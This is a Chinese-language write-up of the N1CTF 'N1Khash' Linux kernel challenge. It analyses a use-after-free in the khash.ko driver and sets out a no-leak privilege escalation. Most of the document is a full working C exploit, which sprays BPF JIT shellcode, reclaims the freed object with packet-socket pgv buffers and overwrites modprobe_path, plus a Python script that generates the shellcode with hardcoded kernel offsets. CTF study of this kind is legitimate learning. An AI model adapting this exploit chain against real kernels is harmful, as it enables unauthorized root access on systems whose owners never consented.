有时间复现一下 N1CTF 中的 N1Khash 这个题目,也是 kernel pwn 的延续了。

题目基本信息

保护机制

给了 Kconfig 文件,可以关注的保护机制如下:

1
2
3
4
5
6
7
8
CONFIG_MEMCG=y
CONFIG_SLUB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
CONFIG_BINFMT_MISC=y
# not set CONFIG_CFI_CLANG
# CONFIG_STATIC_USERMODEHELPER is not set

因此可以尝试通过修改 modprobe_path 路径来进行提权
查看启动脚本如下:

1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64  \
-m 256M \
-cpu qemu64,+smap,+smep \
-kernel bzImage \
-append "console=ttyS0 quiet panic=-1 kaslr sysctl.kernel.dmesg_restrict=1 sysctl.kernel.kptr_restrict=2" \
-initrd rootfs.cpio \
-drive file=/flag,if=virtio,format=raw,readonly=on \
-nographic \
-no-reboot \
-monitor /dev/null

可以看到开启了 smap, smep, kaslr 这些保护

题目基本逻辑

khash.ko 为存在漏洞驱动,ida 看反编译代码很快会发现 close 对应函数进行 kfree 后没有置零,存在 UAF 漏洞。
ioctl 功能实现则比较复杂

kh_init

kh_init 函数实现了设备驱动的初始化,初始化了一些基础变量,同时 alloc_workqueue 初始化了一个工作队列,然后调用 misc_register 注册了名为 n1khash 的设备

misc_register 用于注册杂项设备。杂项设备是一种特殊的字符设备,它们共享一个主设备号(一般为10),但拥有不同的次设备号,内部会调用 register_chrdev 函数,设备节点通常在 /dev 目录下。

kh_fops 结构体则是注册了相关的文件操作函数,包括 open, release, ioctl。

kh_open

kh_open 函数通过 _kmalloc_cache_noprof 函数注册了 kmalloc-256 的对象,flag 为 GFP_KERNEL | GFP_ZERO,并没有做 kmalloc-cg 对象隔离,然后将其放入 file->private_data 成员。

kh_release

kh_release 函数则是直接释放了 open 中申请的对象,存在 UAF 漏洞

kh_ioctl

kh_ioctl 函数则比较复杂,其中当 cmd = 0x4010b110 时会进行延迟工作队列,执行 kh_do_job 函数。

该 cmd 对应的用户传入数据格式是:

1
2
3
4
5
struct kh_queue_req {
uint64_t digest_ptr;
uint32_t count;
uint32_t delay_time;
}

workqueue 是对内核线程封装的用于处理各种工作项的一种处理方法,由于处理对象使用链表拼接一个个工作项,依次取出来处理,然后从链表中删除,类似队列的逻辑,因此也称为工作队列。
当然使用者可以直接实现函数功能然后调用,或者通过 kthread_create() 函数创建新线程,或者 add_timer 添加定时器延时处理,而 workqueue 的使用场景为函数功能简单,且函数内有延时动作。大函数处理事项较多,且需要重复处理,可以单独开辟一个内核线程处理,对延时敏感可以用定时器。
基本操作函数:
work_queue_test = alloc_workqueue(“workqueue_test”, 0, 0) 函数,创建 workqueue
create_workqueue(name) 兼容 alloc_workqueue 的接口
INIT_WORK(&work_test, work_test_func) 初始化工作项
queue_work(workqueue_test, &work_test) 将工作项添加到指定工作队列中

这里通过 queue_delayed_work_on 函数来将工作项添加到了延迟工作队列中。
在 linux 6.12.55 源码中该函数定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/**
* queue_delayed_work_on - queue work on specific CPU after delay
* @cpu: CPU number to execute work on
* @wq: workqueue to use
* @dwork: work to queue
* @delay: number of jiffies to wait before queueing
*
* Return: %false if @work was already on a queue, %true otherwise. If
* @delay is zero and @dwork is idle, it will be scheduled for immediate
* execution.
*/
bool queue_delayed_work_on(int cpu, struct workqueue_struct *wq,
struct delayed_work *dwork, unsigned long delay)
{
struct work_struct *work = &dwork->work;
bool ret = false;
unsigned long irq_flags;

/* read the comment in __queue_work() */
local_irq_save(irq_flags);

if (!test_and_set_bit(WORK_STRUCT_PENDING_BIT, work_data_bits(work)) &&
!clear_pending_if_disabled(work)) {
__queue_delayed_work(cpu, wq, dwork, delay);
ret = true;
}

local_irq_restore(irq_flags);
return ret;
}
EXPORT_SYMBOL(queue_delayed_work_on);

kh_do_job 函数则是会尝试进行指针跳转以及调用,v15 & v16

因此基本思路为通过 ioctl 提交一个延迟工作项执行 kh_do_job 函数,该函数会延迟一段时间后执行(100s),在此期间可以通过关闭文件释放 filp->private_data 结构体,同时申请其他结构体来达到篡改的目的。

漏洞分析

release 函数存在 UAF 漏洞,ioctl 中的 kh_do_job 函数进行指针的间接调用。

漏洞利用

这里使用 pgv 结构体来进行利用,同时由于题目开启了 KASLR 保护,通过 BPFJIT 的方式来在无泄漏的情况下进行提权。

这里由于确实题目还有很多逻辑没有逆向完,可能存在 leak 的途径,这里先跟着参考文章学习下 ret2BPF 无 leak 利用的方法了

ret2bpf 参考🔗
目前题目存在 CFH (Control Flow Hijacking)原语,其 call rbx 存在的指针位于 kmalloc-256 中,因此通过 UAF 可以利用 pgv (任意大小,这里设置 nr_block=32)将其申请回来并进行篡改。
通过 ebpf 程序的 JIT shellcode 喷射可以增加命中率,这里可以直接 call 0xffffffffc1000000 - 0x800。
shellcode 执行原理可以参考上面的 ret2bpf 链接,大致是通过 rdmsr 指令获取到 entry_SYSCALL 函数地址,然后通过加减偏移来获取到其他函数地址,执行 copy_from_user(modprobe_path, buf, size) 的效果。构造 shellcode 通过下面的 gen_sc.py 即可。
脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define SYSCHK(x) \
({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

#define SUCCESS_MSG(msg) "\033[32m\033[1m[+] " msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m[*] " msg "\033[0m"
#define ERROR_MSG(msg) "\033[31m\033[1m[x] " msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERROR_MSG(msg))

/* ========================= BPF JIT spray ========================= */
#include <linux/bpf_common.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/socket.h>

struct sock_filter filter[0x1000];
char buf[0x1000];
int bpf_jit_spray(void) {

char *shellcode =
(void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
strcpy(shellcode, "/tmp/getshell");

int stopfd[2];
SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd));

unsigned int prog_len = 0x900; // In current environment, the max instructions
// in a program is near 0x900
struct sock_filter table[] = {
{.code = BPF_LD + BPF_K,
.k =
0xb3909090}, // 0xb3909090 is NOPsled shellclode to make exploitation
// more reliable (b3 b8 mov bl, 0xb8)
{.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}};

for (int i = 0; i < prog_len; i++) {
filter[i] = table[0];
}

filter[prog_len - 1] = table[1];
int idx = prog_len - 2;

#include "sc.h"

struct sock_fprog prog = {
.len = prog_len,
.filter = filter,
};

int fd[2];
int fork_limit = 0x30;
for (int k = 0; k < fork_limit; k++) {
if (fork() == 0) {
close(stopfd[1]); // use fork to bypass RLIMIT_NOFILE limit.
for (int i = 0; i < 0x20; i++) {
SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog,
sizeof(prog)));
}
write(stopfd[0], buf, 1);
read(stopfd[0], buf, 1);
exit(0);
}
}
read(stopfd[1], buf,
fork_limit); /* wait for all forks to finish spraying BPF code */
}

int check_modprobe() {
char buf[0x100] = {};
int modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY);
read(modprobe, buf, sizeof(buf));
printf("modprobe: %20s\n", buf);
close(modprobe);
char *old = "/sbin/modprobe";
return strncmp(buf, old, strlen(old)) != 0;
}
/* ========================= BPF JIT spray ========================= */

/* =========================== pgv spray =========================== */
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include <sched.h>
#include <sys/socket.h>

#ifndef TPACKET_V3
#define TPACKET_V3 2
#endif
int cmd_pipe_req[2], cmd_pipe_reply[2];
#define SPRAY_PG_VEC_NUM 20
#define PAGE_NUM (256 / 8) // modify this to alloc arbitrary size pgv
int pgfd[SPRAY_PG_VEC_NUM] = {};
void *pgaddr[SPRAY_PG_VEC_NUM] = {};

/* create an isolate namespace for pgv */
void unshare_setup(void) {
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

struct tpacket_req3 {
unsigned int tp_block_size; /* Minimal size of contiguous block */
unsigned int tp_block_nr; /* Number of blocks */
unsigned int tp_frame_size; /* Size of frame */
unsigned int tp_frame_nr; /* Total number of frames */
unsigned int tp_retire_blk_tov; /* timeout in msecs */
unsigned int tp_sizeof_priv; /* offset to private data area */
unsigned int tp_feature_req_word;
};

void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv,
unsigned int timeout) {
int v = TPACKET_V3;
SYSCHK(setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)));

struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;

SYSCHK(setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)));
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv,
int timeout) {
int s = SYSCHK(socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)));
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv,
timeout);
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
SYSCHK(bind(s, (struct sockaddr *)&sa, sizeof(sa)));
return s;
}

char void_buf[1] = {0};
void spray_pgv_thread() {
unshare_setup();
read(cmd_pipe_req[0], void_buf, 1);
for (int i = 0; i < SPRAY_PG_VEC_NUM; i++) {
pgfd[i] = packet_socket_setup(0x1000, 2048, PAGE_NUM, 0, 10000);
}

for (int i = 0; i < SPRAY_PG_VEC_NUM; i++) {
if (!pgfd[i])
continue;
pgaddr[i] = mmap(NULL, PAGE_NUM * 0x1000, PROT_READ | PROT_WRITE,
MAP_SHARED, pgfd[i], 0);
for (int j = 0; j < PAGE_NUM; j++) {
unsigned long *pgv_buff = pgaddr[i] + j * 0x1000;
pgv_buff[0] = 0xffffffffc1000000 - 0x800;
}
}
write(cmd_pipe_reply[1], void_buf, 1);

sleep(999);
exit(0);
}
/* =========================== pgv spray =========================== */
#define DEV_PATH "/dev/n1khash"

#define VULN_CMD 0x4010B110

int dev_fd = 0;

struct kh_queue_req {
uint64_t digest_ptr;
uint32_t count;
uint32_t delay_time;
};

void vuln(uint64_t digest_ptr, uint32_t count, uint32_t delay_time) {
struct kh_queue_req req = {
.digest_ptr = digest_ptr, .count = count, .delay_time = delay_time};
SYSCHK(ioctl(dev_fd, VULN_CMD, &req));
}

#define ROOT_SCRIPT_PATH "/tmp/getshell"
char root_cmd[] = "#!/bin/sh\nchmod 777 /flag";
char flag[0x30];

int main() {
pipe(cmd_pipe_reply);
pipe(cmd_pipe_req);

// bpf jit spray
log_info("spraying bpf jit shellcode...");
bpf_jit_spray();
// pgv spray
log_info("spraying pgv[32] struct...");
if (fork() == 0)
spray_pgv_thread();

dev_fd = open(DEV_PATH, O_RDWR);
if (dev_fd > 0)
log_info("open /dev/khash success!");

vuln(0, 0x10, 0x1000);
close(dev_fd);

// reclaim obj with pgv
log_info("reclaiming obj with pgv...");
write(cmd_pipe_req[1], void_buf, 1);
read(cmd_pipe_reply[0], void_buf, 1);
log_info("reclaim obj done!");

while (1) {
if (check_modprobe()) {
break;
sleep(1);
}
}

log_success("successfully modified modprobe_path!");

/* create fake modprobe_path file */
int root_script_fd, flag_fd;
root_script_fd = open(ROOT_SCRIPT_PATH, O_RDWR | O_CREAT);
write(root_script_fd, root_cmd, sizeof(root_cmd));
close(root_script_fd);
system("chmod +x " ROOT_SCRIPT_PATH);
/* trigger the fake modprobe_path */
puts("[*] trigerring fake modprobe_path...");

system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
system("chmod +x /tmp/fake");
system("/tmp/fake");
/* read flag */
memset(flag, 0, sizeof(flag));

flag_fd = open("/flag", O_RDWR);
if (flag_fd < 0) {
log_error("open /flag failed!");
perror("Error: ");
return -1;
}

read(flag_fd, flag, sizeof(flag));
printf("\033[32m\033[1m[+] Got flag: \033[0m%s\n", flag);
}

gen_sc.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/env python3

from pwn import *
import struct

entry_syscall = 0xffffffff82800080 # entry_SYSCALL_64
modprobe_path = 0xffffffff84194620
copy_from_user = 0xffffffff81b6ffa0
msleep = 0xffffffff81271380

off1 = entry_syscall - modprobe_path
off2 = modprobe_path - copy_from_user
off3 = copy_from_user - msleep


context.arch = 'amd64'


def load_reg(_reg, _val): # reg is base reg, add / dec _val
ins = ["sub", "add"]
return f'''
xor esi,esi
mov sil, {(abs(_val) >> 24) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 16) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 8) & 0xff}
shl esi, 8
mov sil, {(abs(_val)) & 0xff}
{ins[_val < 0]} {_reg}, rsi
'''


ASM = f"""
; do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64; ECX should be MSR_LSTAR ( 0xc0000082 )
xor edx, edx
mov cl, 0xc0
shl ecx, 24
mov cl, 0x82
rdmsr
; make rdx = entry_SYSCALL_64's address
mov cl, 32
shl rdx, cl
add rdx, rax
; entry_SYSCALL_64 + offset = core_pattern
; move core_pattern to rdi ( 1st arg )
{load_reg('rdx', off1)}
mov rdi, rdx
; move copy_from_user to rax
{load_reg('rdx', off2)}
mov rax, rdx
; call copy_from_user(core_pattern, user_buf, 0x30); user_buf = 0xa00000
xor esi, esi
mov sil, 0xa0
shl esi, 16
xor edx, edx
mov dl, 0x30
push rax
call rax
pop rax
{load_reg('rax', off3)}
; move 0x7000000 to rdi ( 1st arg )
xor edi,edi
mov dil,0x70
shl edi,20
call rax
"""
# msleep is better than jmp $+0


with open("sc.h", "w") as f:
for a in ASM.strip().split("\n")[::-1]:
if a.strip() == '' or a[0] == ';':
continue
cur = asm(a)
assert len(cur) <= 3
cur = hex(struct.unpack('<I', cur.ljust(3, b'\x90') + b'\x3c')[0])
sc = "filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = " + cur + "};"
print(sc)
f.write(sc + "\n")

这里原博客提到 6.2 版本后 modprobe 不再能直接通过执行 unknown binary 来触发,但这里好像直接去执行也能正常触发,不知道为啥,有知道的师傅可以留言 :-)。

参考链接